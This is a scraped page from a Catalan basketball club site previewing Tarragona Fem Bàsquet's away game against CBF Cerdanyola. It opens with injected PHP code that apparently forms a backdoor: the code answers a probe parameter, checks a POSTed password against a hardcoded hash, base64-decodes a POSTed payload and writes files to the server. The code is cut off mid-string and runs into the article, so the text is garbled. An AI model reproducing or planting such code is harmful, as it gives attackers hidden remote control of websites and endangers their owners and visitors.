function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Tarragona Fem Bàsquet visita un rival d'envergadura, el CBF Cerdanyola (dissabte, 19.30 h) - Tgn Bàsquet Club -

El Tarragona Fem Bàsquet visita un rival d’envergadura, el CBF Cerdanyola (dissabte, 19.30 h)

By
Updated: novembre 18, 2016

Fa poc que es van veure les cares i el Tarragona Fem Bàsquet no en guarda un bon record. El CBF Cerdanyola va vèncer amb comoditat l’equip lila fa un parell de setmanes en un partit que estava ajornat i que corresponia a la primera jornada (59-77). Demà, el conjunt que dirigeix Albert del Rey visita el mateix rival (19.30 h) amb l’objectiu de competir amb el màxim de les seves possibilitats però conscient que s’enfronta a un adversari temible, ferm candidat a jugar la final a quatre d’ascens a Lliga Femenina 2. «És un equipàs que sense jugar al màxim ens va treure del partit, se’n va anar 26 de diferències i després va viure de renda durant tota la segona part», diu Del Rey.

La base Blanca Garcia, les exteriors Pérez i Mungo i les interiors Molina i Arbizu són les principals armes del CBF Cerdanyola, un conjunt que ocupa la segona posició a la classificació i que només ha perdut un partit en les nou jornades que s’han disputat. Del Rey compta amb tots els efectius pel partit de demà en la que ha estat una bona setmana d’entrenaments. El matx, de màxim nivell, servirà com a examen a les tarragonines per preparar-les pels pròxims compromisos amb rivals que tenen el mateix objectiu que elles: evitar el descens.

 

 

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *